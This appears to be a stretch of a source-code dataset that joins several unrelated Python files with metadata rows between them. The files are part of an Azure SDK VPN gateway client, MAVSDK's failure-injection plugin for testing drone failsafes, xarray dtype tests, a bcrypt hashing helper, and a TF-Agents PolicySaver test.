cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop_packet_capture.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/stoppacketcapture'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.ListVpnGatewaysResult"]:
"""Lists all the VpnGateways in a resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways'} # type: ignore
def list(
self,
**kwargs
) -> AsyncIterable["_models.ListVpnGatewaysResult"]:
"""Lists all the VpnGateways in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways'} # type: ignore
| 49.656442 | 211 | 0.667696 |
42f9888bcd5645c4807993e12f0adea6a1992b56
| 14,047 |
py
|
Python
|
mavsdk/failure.py
|
NicolasM0/MAVSDK-Python
|
41633177a040dd535ad4adf38764a81c10d50760
|
[
"BSD-3-Clause"
] | 1 |
2020-07-11T10:02:28.000Z
|
2020-07-11T10:02:28.000Z
|
mavsdk/failure.py
|
NicolasM0/MAVSDK-Python
|
41633177a040dd535ad4adf38764a81c10d50760
|
[
"BSD-3-Clause"
] | null | null | null |
mavsdk/failure.py
|
NicolasM0/MAVSDK-Python
|
41633177a040dd535ad4adf38764a81c10d50760
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# DO NOT EDIT! This file is auto-generated from
# https://github.com/mavlink/MAVSDK-Python/tree/master/other/templates/py
from ._base import AsyncBase
from . import failure_pb2, failure_pb2_grpc
from enum import Enum
class FailureUnit(Enum):
"""
A failure unit.
Values
------
SENSOR_GYRO
Gyro
SENSOR_ACCEL
Accelerometer
SENSOR_MAG
Magnetometer
SENSOR_BARO
Barometer
SENSOR_GPS
GPS
SENSOR_OPTICAL_FLOW
Optical flow
SENSOR_VIO
Visual inertial odometry
SENSOR_DISTANCE_SENSOR
Distance sensor
SENSOR_AIRSPEED
Airspeed
SYSTEM_BATTERY
Battery
SYSTEM_MOTOR
Motor
SYSTEM_SERVO
Servo
SYSTEM_AVOIDANCE
Avoidance
SYSTEM_RC_SIGNAL
RC signal
SYSTEM_MAVLINK_SIGNAL
MAVLink signal
"""
SENSOR_GYRO = 0
SENSOR_ACCEL = 1
SENSOR_MAG = 2
SENSOR_BARO = 3
SENSOR_GPS = 4
SENSOR_OPTICAL_FLOW = 5
SENSOR_VIO = 6
SENSOR_DISTANCE_SENSOR = 7
SENSOR_AIRSPEED = 8
SYSTEM_BATTERY = 9
SYSTEM_MOTOR = 10
SYSTEM_SERVO = 11
SYSTEM_AVOIDANCE = 12
SYSTEM_RC_SIGNAL = 13
SYSTEM_MAVLINK_SIGNAL = 14
def translate_to_rpc(self):
if self == FailureUnit.SENSOR_GYRO:
return failure_pb2.FAILURE_UNIT_SENSOR_GYRO
if self == FailureUnit.SENSOR_ACCEL:
return failure_pb2.FAILURE_UNIT_SENSOR_ACCEL
if self == FailureUnit.SENSOR_MAG:
return failure_pb2.FAILURE_UNIT_SENSOR_MAG
if self == FailureUnit.SENSOR_BARO:
return failure_pb2.FAILURE_UNIT_SENSOR_BARO
if self == FailureUnit.SENSOR_GPS:
return failure_pb2.FAILURE_UNIT_SENSOR_GPS
if self == FailureUnit.SENSOR_OPTICAL_FLOW:
return failure_pb2.FAILURE_UNIT_SENSOR_OPTICAL_FLOW
if self == FailureUnit.SENSOR_VIO:
return failure_pb2.FAILURE_UNIT_SENSOR_VIO
if self == FailureUnit.SENSOR_DISTANCE_SENSOR:
return failure_pb2.FAILURE_UNIT_SENSOR_DISTANCE_SENSOR
if self == FailureUnit.SENSOR_AIRSPEED:
return failure_pb2.FAILURE_UNIT_SENSOR_AIRSPEED
if self == FailureUnit.SYSTEM_BATTERY:
return failure_pb2.FAILURE_UNIT_SYSTEM_BATTERY
if self == FailureUnit.SYSTEM_MOTOR:
return failure_pb2.FAILURE_UNIT_SYSTEM_MOTOR
if self == FailureUnit.SYSTEM_SERVO:
return failure_pb2.FAILURE_UNIT_SYSTEM_SERVO
if self == FailureUnit.SYSTEM_AVOIDANCE:
return failure_pb2.FAILURE_UNIT_SYSTEM_AVOIDANCE
if self == FailureUnit.SYSTEM_RC_SIGNAL:
return failure_pb2.FAILURE_UNIT_SYSTEM_RC_SIGNAL
if self == FailureUnit.SYSTEM_MAVLINK_SIGNAL:
return failure_pb2.FAILURE_UNIT_SYSTEM_MAVLINK_SIGNAL
@staticmethod
def translate_from_rpc(rpc_enum_value):
""" Parses a gRPC response """
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_GYRO:
return FailureUnit.SENSOR_GYRO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_ACCEL:
return FailureUnit.SENSOR_ACCEL
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_MAG:
return FailureUnit.SENSOR_MAG
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_BARO:
return FailureUnit.SENSOR_BARO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_GPS:
return FailureUnit.SENSOR_GPS
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_OPTICAL_FLOW:
return FailureUnit.SENSOR_OPTICAL_FLOW
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_VIO:
return FailureUnit.SENSOR_VIO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_DISTANCE_SENSOR:
return FailureUnit.SENSOR_DISTANCE_SENSOR
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_AIRSPEED:
return FailureUnit.SENSOR_AIRSPEED
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_BATTERY:
return FailureUnit.SYSTEM_BATTERY
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_MOTOR:
return FailureUnit.SYSTEM_MOTOR
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_SERVO:
return FailureUnit.SYSTEM_SERVO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_AVOIDANCE:
return FailureUnit.SYSTEM_AVOIDANCE
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_RC_SIGNAL:
return FailureUnit.SYSTEM_RC_SIGNAL
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_MAVLINK_SIGNAL:
return FailureUnit.SYSTEM_MAVLINK_SIGNAL
def __str__(self):
return self.name
class FailureType(Enum):
"""
A failure type
Values
------
OK
No failure injected, used to reset a previous failure
OFF
Sets unit off, so completely non-responsive
STUCK
Unit is stuck e.g. keeps reporting the same value
GARBAGE
Unit is reporting complete garbage
WRONG
Unit is consistently wrong
SLOW
Unit is slow, so e.g. reporting at slower than expected rate
DELAYED
Data of unit is delayed in time
INTERMITTENT
Unit is sometimes working, sometimes not
"""
OK = 0
OFF = 1
STUCK = 2
GARBAGE = 3
WRONG = 4
SLOW = 5
DELAYED = 6
INTERMITTENT = 7
def translate_to_rpc(self):
if self == FailureType.OK:
return failure_pb2.FAILURE_TYPE_OK
if self == FailureType.OFF:
return failure_pb2.FAILURE_TYPE_OFF
if self == FailureType.STUCK:
return failure_pb2.FAILURE_TYPE_STUCK
if self == FailureType.GARBAGE:
return failure_pb2.FAILURE_TYPE_GARBAGE
if self == FailureType.WRONG:
return failure_pb2.FAILURE_TYPE_WRONG
if self == FailureType.SLOW:
return failure_pb2.FAILURE_TYPE_SLOW
if self == FailureType.DELAYED:
return failure_pb2.FAILURE_TYPE_DELAYED
if self == FailureType.INTERMITTENT:
return failure_pb2.FAILURE_TYPE_INTERMITTENT
@staticmethod
def translate_from_rpc(rpc_enum_value):
""" Parses a gRPC response """
if rpc_enum_value == failure_pb2.FAILURE_TYPE_OK:
return FailureType.OK
if rpc_enum_value == failure_pb2.FAILURE_TYPE_OFF:
return FailureType.OFF
if rpc_enum_value == failure_pb2.FAILURE_TYPE_STUCK:
return FailureType.STUCK
if rpc_enum_value == failure_pb2.FAILURE_TYPE_GARBAGE:
return FailureType.GARBAGE
if rpc_enum_value == failure_pb2.FAILURE_TYPE_WRONG:
return FailureType.WRONG
if rpc_enum_value == failure_pb2.FAILURE_TYPE_SLOW:
return FailureType.SLOW
if rpc_enum_value == failure_pb2.FAILURE_TYPE_DELAYED:
return FailureType.DELAYED
if rpc_enum_value == failure_pb2.FAILURE_TYPE_INTERMITTENT:
return FailureType.INTERMITTENT
def __str__(self):
return self.name
class FailureResult:
"""
Parameters
----------
result : Result
Result enum value
result_str : std::string
Human-readable English string describing the result
"""
class Result(Enum):
"""
Possible results returned for failure requests.
Values
------
UNKNOWN
Unknown result
SUCCESS
Request succeeded
NO_SYSTEM
No system is connected
CONNECTION_ERROR
Connection error
UNSUPPORTED
Failure not supported
DENIED
Failure injection denied
DISABLED
Failure injection is disabled
TIMEOUT
Request timed out
"""
UNKNOWN = 0
SUCCESS = 1
NO_SYSTEM = 2
CONNECTION_ERROR = 3
UNSUPPORTED = 4
DENIED = 5
DISABLED = 6
TIMEOUT = 7
def translate_to_rpc(self):
if self == FailureResult.Result.UNKNOWN:
return failure_pb2.FailureResult.RESULT_UNKNOWN
if self == FailureResult.Result.SUCCESS:
return failure_pb2.FailureResult.RESULT_SUCCESS
if self == FailureResult.Result.NO_SYSTEM:
return failure_pb2.FailureResult.RESULT_NO_SYSTEM
if self == FailureResult.Result.CONNECTION_ERROR:
return failure_pb2.FailureResult.RESULT_CONNECTION_ERROR
if self == FailureResult.Result.UNSUPPORTED:
return failure_pb2.FailureResult.RESULT_UNSUPPORTED
if self == FailureResult.Result.DENIED:
return failure_pb2.FailureResult.RESULT_DENIED
if self == FailureResult.Result.DISABLED:
return failure_pb2.FailureResult.RESULT_DISABLED
if self == FailureResult.Result.TIMEOUT:
return failure_pb2.FailureResult.RESULT_TIMEOUT
@staticmethod
def translate_from_rpc(rpc_enum_value):
""" Parses a gRPC response """
if rpc_enum_value == failure_pb2.FailureResult.RESULT_UNKNOWN:
return FailureResult.Result.UNKNOWN
if rpc_enum_value == failure_pb2.FailureResult.RESULT_SUCCESS:
return FailureResult.Result.SUCCESS
if rpc_enum_value == failure_pb2.FailureResult.RESULT_NO_SYSTEM:
return FailureResult.Result.NO_SYSTEM
if rpc_enum_value == failure_pb2.FailureResult.RESULT_CONNECTION_ERROR:
return FailureResult.Result.CONNECTION_ERROR
if rpc_enum_value == failure_pb2.FailureResult.RESULT_UNSUPPORTED:
return FailureResult.Result.UNSUPPORTED
if rpc_enum_value == failure_pb2.FailureResult.RESULT_DENIED:
return FailureResult.Result.DENIED
if rpc_enum_value == failure_pb2.FailureResult.RESULT_DISABLED:
return FailureResult.Result.DISABLED
if rpc_enum_value == failure_pb2.FailureResult.RESULT_TIMEOUT:
return FailureResult.Result.TIMEOUT
def __str__(self):
return self.name
def __init__(
self,
result,
result_str):
""" Initializes the FailureResult object """
self.result = result
self.result_str = result_str
def __equals__(self, to_compare):
""" Checks if two FailureResult are the same """
try:
# Try to compare - this likely fails when it is compared to a non
# FailureResult object
return \
(self.result == to_compare.result) and \
(self.result_str == to_compare.result_str)
except AttributeError:
return False
def __str__(self):
""" FailureResult in string representation """
struct_repr = ", ".join([
"result: " + str(self.result),
"result_str: " + str(self.result_str)
])
return f"FailureResult: [{struct_repr}]"
@staticmethod
def translate_from_rpc(rpcFailureResult):
""" Translates a gRPC struct to the SDK equivalent """
return FailureResult(
FailureResult.Result.translate_from_rpc(rpcFailureResult.result),
rpcFailureResult.result_str
)
def translate_to_rpc(self, rpcFailureResult):
""" Translates this SDK object into its gRPC equivalent """
rpcFailureResult.result = self.result.translate_to_rpc()
rpcFailureResult.result_str = self.result_str
class FailureError(Exception):
""" Raised when a FailureResult is a fail code """
def __init__(self, result, origin, *params):
self._result = result
self._origin = origin
self._params = params
def __str__(self):
return f"{self._result.result}: '{self._result.result_str}'; origin: {self._origin}; params: {self._params}"
class Failure(AsyncBase):
"""
Inject failures into system to test failsafes.
Generated by dcsdkgen - MAVSDK Failure API
"""
# Plugin name
name = "Failure"
def _setup_stub(self, channel):
""" Setups the api stub """
self._stub = failure_pb2_grpc.FailureServiceStub(channel)
def _extract_result(self, response):
""" Returns the response status and description """
return FailureResult.translate_from_rpc(response.failure_result)
async def inject(self, failure_unit, failure_type, instance):
"""
Injects a failure.
Parameters
----------
failure_unit : FailureUnit
The failure unit to send
failure_type : FailureType
The failure type to send
instance : int32_t
Instance to affect (0 for all)
Raises
------
FailureError
If the request fails. The error contains the reason for the failure.
"""
request = failure_pb2.InjectRequest()
request.failure_unit = failure_unit.translate_to_rpc()
request.failure_type = failure_type.translate_to_rpc()
request.instance = instance
response = await self._stub.Inject(request)
result = self._extract_result(response)
if result.result is not FailureResult.Result.SUCCESS:
raise FailureError(result, "inject()", failure_unit, failure_type, instance)
| 30.404762 | 116 | 0.628319 |
823e899aecf5881c99e791fd7099ceb1404c2f55
| 418 |
py
|
Python
|
tests/test_api.py
|
pinntech/pinn-python
|
d7d3f2d2a4cdc3eb01ae85a117c0e3d8bc1732bd
|
[
"MIT"
] | 2 |
2019-03-29T17:36:44.000Z
|
2021-11-20T00:05:04.000Z
|
tests/test_api.py
|
pinntech/pinn-python
|
d7d3f2d2a4cdc3eb01ae85a117c0e3d8bc1732bd
|
[
"MIT"
] | 4 |
2020-03-24T16:52:29.000Z
|
2021-06-01T23:36:18.000Z
|
tests/test_api.py
|
pinntech/pinn-python
|
d7d3f2d2a4cdc3eb01ae85a117c0e3d8bc1732bd
|
[
"MIT"
] | 1 |
2021-11-20T00:05:07.000Z
|
2021-11-20T00:05:07.000Z
|
"""
:copyright: (c) 2019 Pinn Technologies, Inc.
:license: MIT
"""
def test_import():
import pinn
def test_configuration_error():
import pinn
try:
pinn.User.create()
except pinn.errors.ConfigurationError:
pass
def test_authentication_error():
import pinn
pinn.secret_key = 'foo'
try:
pinn.User.create()
except pinn.errors.AuthenticationError:
pass
| 16.076923 | 44 | 0.645933 |
1c942a1e6c80c09cc6afff40460be5ab93c827ed
| 3,472 |
py
|
Python
|
xarray/tests/test_dtypes.py
|
ianthomas23/xarray
|
aa1d1d19b822897399c8ed2cf346afbac71f45b3
|
[
"Apache-2.0"
] | null | null | null |
xarray/tests/test_dtypes.py
|
ianthomas23/xarray
|
aa1d1d19b822897399c8ed2cf346afbac71f45b3
|
[
"Apache-2.0"
] | null | null | null |
xarray/tests/test_dtypes.py
|
ianthomas23/xarray
|
aa1d1d19b822897399c8ed2cf346afbac71f45b3
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
import numpy as np
import pytest
from xarray.core import dtypes
@pytest.mark.parametrize(
"args, expected",
[
([bool], bool),
([bool, np.string_], np.object_),
([np.float32, np.float64], np.float64),
([np.float32, np.string_], np.object_),
([np.unicode_, np.int64], np.object_),
([np.unicode_, np.unicode_], np.unicode_),
([np.bytes_, np.unicode_], np.object_),
],
)
def test_result_type(args, expected):
actual = dtypes.result_type(*args)
assert actual == expected
def test_result_type_scalar():
actual = dtypes.result_type(np.arange(3, dtype=np.float32), np.nan)
assert actual == np.float32
def test_result_type_dask_array():
# verify it works without evaluating dask arrays
da = pytest.importorskip("dask.array")
dask = pytest.importorskip("dask")
def error():
raise RuntimeError
array = da.from_delayed(dask.delayed(error)(), (), np.float64)
with pytest.raises(RuntimeError):
array.compute()
actual = dtypes.result_type(array)
assert actual == np.float64
# note that this differs from the behavior for scalar numpy arrays, which
# would get promoted to float32
actual = dtypes.result_type(array, np.array([0.5, 1.0], dtype=np.float32))
assert actual == np.float64
@pytest.mark.parametrize("obj", [1.0, np.inf, "ab", 1.0 + 1.0j, True])
def test_inf(obj):
assert dtypes.INF > obj
assert dtypes.NINF < obj
@pytest.mark.parametrize(
"kind, expected",
[
("a", (np.dtype("O"), "nan")), # dtype('S')
("b", (np.float32, "nan")), # dtype('int8')
("B", (np.float32, "nan")), # dtype('uint8')
("c", (np.dtype("O"), "nan")), # dtype('S1')
("D", (np.complex128, "(nan+nanj)")), # dtype('complex128')
("d", (np.float64, "nan")), # dtype('float64')
("e", (np.float16, "nan")), # dtype('float16')
("F", (np.complex64, "(nan+nanj)")), # dtype('complex64')
("f", (np.float32, "nan")), # dtype('float32')
("h", (np.float32, "nan")), # dtype('int16')
("H", (np.float32, "nan")), # dtype('uint16')
("i", (np.float64, "nan")), # dtype('int32')
("I", (np.float64, "nan")), # dtype('uint32')
("l", (np.float64, "nan")), # dtype('int64')
("L", (np.float64, "nan")), # dtype('uint64')
("m", (np.timedelta64, "NaT")), # dtype('<m8')
("M", (np.datetime64, "NaT")), # dtype('<M8')
("O", (np.dtype("O"), "nan")), # dtype('O')
("p", (np.float64, "nan")), # dtype('int64')
("P", (np.float64, "nan")), # dtype('uint64')
("q", (np.float64, "nan")), # dtype('int64')
("Q", (np.float64, "nan")), # dtype('uint64')
("S", (np.dtype("O"), "nan")), # dtype('S')
("U", (np.dtype("O"), "nan")), # dtype('<U')
("V", (np.dtype("O"), "nan")), # dtype('V')
],
)
def test_maybe_promote(kind, expected):
# 'g': np.float128 is not tested : not available on all platforms
# 'G': np.complex256 is not tested : not available on all platforms
actual = dtypes.maybe_promote(np.dtype(kind))
assert actual[0] == expected[0]
assert str(actual[1]) == expected[1]
def test_nat_types_membership():
assert np.datetime64("NaT").dtype in dtypes.NAT_TYPES
assert np.timedelta64("NaT").dtype in dtypes.NAT_TYPES
assert np.float64 not in dtypes.NAT_TYPES
| 34.376238 | 78 | 0.567396 |
7ee154247bb0b83037ecae140405579c83f06457
| 298 |
py
|
Python
|
backend/app/literature/hashing.py
|
alliance-genome/agr_literature_service_demo
|
48cd3a3797f96ef94e6d40d2c94e379bfc48914f
|
[
"MIT"
] | 1 |
2021-12-18T15:06:41.000Z
|
2021-12-18T15:06:41.000Z
|
res-page/hashing.py
|
beyondchan28/API-Server-1---Learning-Reource-Godot
|
bb1f00830cf0884bd8b369960e7bad54e90beee2
|
[
"MIT"
] | null | null | null |
res-page/hashing.py
|
beyondchan28/API-Server-1---Learning-Reource-Godot
|
bb1f00830cf0884bd8b369960e7bad54e90beee2
|
[
"MIT"
] | null | null | null |
from passlib.context import CryptContext
pwd_cxt = CryptContext(schemes=["bcrypt"], deprecated="auto")
class Hash():
def bcrypt(password: str):
return pwd_cxt.hash(password)
def verify(hashed_password,plain_password):
return pwd_cxt.verify(plain_password,hashed_password)
| 29.8 | 61 | 0.744966 |
5682c336cb33e1eee8dcb6f2e4ee73a6bb8d8456
| 17,610 |
py
|
Python
|
tf_agents/policies/policy_saver_test.py
|
kvzhao/agents
|
3bbf635a4f8f1f9255e0d7315b1163f84d96a4f7
|
[
"Apache-2.0"
] | 3 |
2019-10-02T13:55:14.000Z
|
2021-05-06T23:08:45.000Z
|
tf_agents/policies/policy_saver_test.py
|
nealwu/agents
|
27b9498689ea5b8f69fc77ada752e05e38192852
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/policies/policy_saver_test.py
|
nealwu/agents
|
27b9498689ea5b8f69fc77ada752e05e38192852
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for PolicySaver."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import tensorflow as tf
from tf_agents.networks import q_network
from tf_agents.networks import q_rnn_network
from tf_agents.policies import policy_saver
from tf_agents.policies import q_policy
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import time_step as ts
from tf_agents.utils import common
from tf_agents.utils import test_utils
class PolicySaverTest(test_utils.TestCase, parameterized.TestCase):
def setUp(self):
super(PolicySaverTest, self).setUp()
self._time_step_spec = ts.TimeStep(
step_type=tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), name='st',
minimum=0, maximum=2),
reward=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(), name='reward',
minimum=0.0, maximum=5.0),
discount=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(), name='discount',
minimum=0.0, maximum=1.0),
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(4,), name='obs',
minimum=-10.0, maximum=10.0))
self._action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=10, name='act_0')
self._global_seed = 12345
tf.compat.v1.set_random_seed(self._global_seed)
def testUniqueSignatures(self):
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver = policy_saver.PolicySaver(policy, batch_size=None)
action_signature_names = [
s.name for s in saver._signatures['action'].input_signature
]
self.assertAllEqual(
['0/step_type', '0/reward', '0/discount', '0/observation'],
action_signature_names)
initial_state_signature_names = [
s.name for s in saver._signatures['get_initial_state'].input_signature
]
self.assertAllEqual(['batch_size'], initial_state_signature_names)
def testRenamedSignatures(self):
time_step_spec = self._time_step_spec._replace(
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(4,), minimum=-10.0, maximum=10.0))
network = q_network.QNetwork(
input_tensor_spec=time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver = policy_saver.PolicySaver(policy, batch_size=None)
action_signature_names = [
s.name for s in saver._signatures['action'].input_signature
]
self.assertAllEqual(
['0/step_type', '0/reward', '0/discount', '0/observation'],
action_signature_names)
initial_state_signature_names = [
s.name for s in saver._signatures['get_initial_state'].input_signature
]
self.assertAllEqual(['batch_size'], initial_state_signature_names)
@parameterized.named_parameters(('NotSeededNoState', False, False),
('NotSeededWithState', False, True),
('SeededNoState', True, False),
('SeededWithState', True, True))
def testSaveAction(self, seeded, has_state):
with tf.compat.v1.Graph().as_default():
tf.compat.v1.set_random_seed(self._global_seed)
with tf.compat.v1.Session().as_default():
if has_state:
network = q_rnn_network.QRnnNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
else:
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
action_seed = 98723
batch_size = 3
action_inputs = tensor_spec.sample_spec_nest(
(self._time_step_spec, policy.policy_state_spec),
outer_dims=(batch_size,), seed=4)
action_input_values = self.evaluate(action_inputs)
action_input_tensors = tf.nest.map_structure(
tf.convert_to_tensor, action_input_values)
action_output = policy.action(*action_input_tensors, seed=action_seed)
self.evaluate(tf.compat.v1.global_variables_initializer())
action_output_dict = dict((
(spec.name, value) for (spec, value) in
zip(tf.nest.flatten(policy.policy_step_spec),
tf.nest.flatten(action_output))))
# Check output of the flattened signature call.
(action_output_value, action_output_dict) = self.evaluate(
(action_output, action_output_dict))
saver = policy_saver.PolicySaver(
policy, batch_size=None, use_nest_path_signatures=False,
seed=action_seed)
path = os.path.join(self.get_temp_dir(), 'save_model_action')
saver.save(path)
with tf.compat.v1.Graph().as_default():
tf.compat.v1.set_random_seed(self._global_seed)
with tf.compat.v1.Session().as_default():
reloaded = tf.compat.v2.saved_model.load(path)
self.assertIn('action', reloaded.signatures)
reloaded_action = reloaded.signatures['action']
self._compare_input_output_specs(
reloaded_action,
expected_input_specs=(self._time_step_spec,
policy.policy_state_spec),
expected_output_spec=policy.policy_step_spec,
batch_input=True)
# Reload action_input_values as tensors in the new graph.
action_input_tensors = tf.nest.map_structure(
tf.convert_to_tensor, action_input_values)
action_input_spec = (self._time_step_spec, policy.policy_state_spec)
function_action_input_dict = dict(
(spec.name, value) for (spec, value) in
zip(tf.nest.flatten(action_input_spec),
tf.nest.flatten(action_input_tensors)))
# NOTE(ebrevdo): The graph-level seeds for the policy and the reloaded
# model are equal, which in addition to seeding the call to action() and
# PolicySaver helps ensure equality of the output of action() in both
# cases.
self.assertEqual(reloaded_action.graph.seed, self._global_seed)
# The seed= argument for the SavedModel action call was given at
# creation of the PolicySaver.
# This is the flat-signature function.
reloaded_action_output_dict = reloaded_action(
**function_action_input_dict)
def match_dtype_shape(x, y, msg=None):
self.assertEqual(x.shape, y.shape, msg=msg)
self.assertEqual(x.dtype, y.dtype, msg=msg)
# This is the non-flat function.
if has_state:
reloaded_action_output = reloaded.action(*action_input_tensors)
else:
# Try both cases: one with an empty policy_state and one with no
# policy_state. Compare them.
# NOTE(ebrevdo): The first call to .action() must be stored in
# reloaded_action_output because this is the version being compared
# later against the true action_output and the values will change
# after the first call due to randomness.
reloaded_action_output = reloaded.action(*action_input_tensors)
reloaded_action_output_no_input_state = reloaded.action(
action_input_tensors[0])
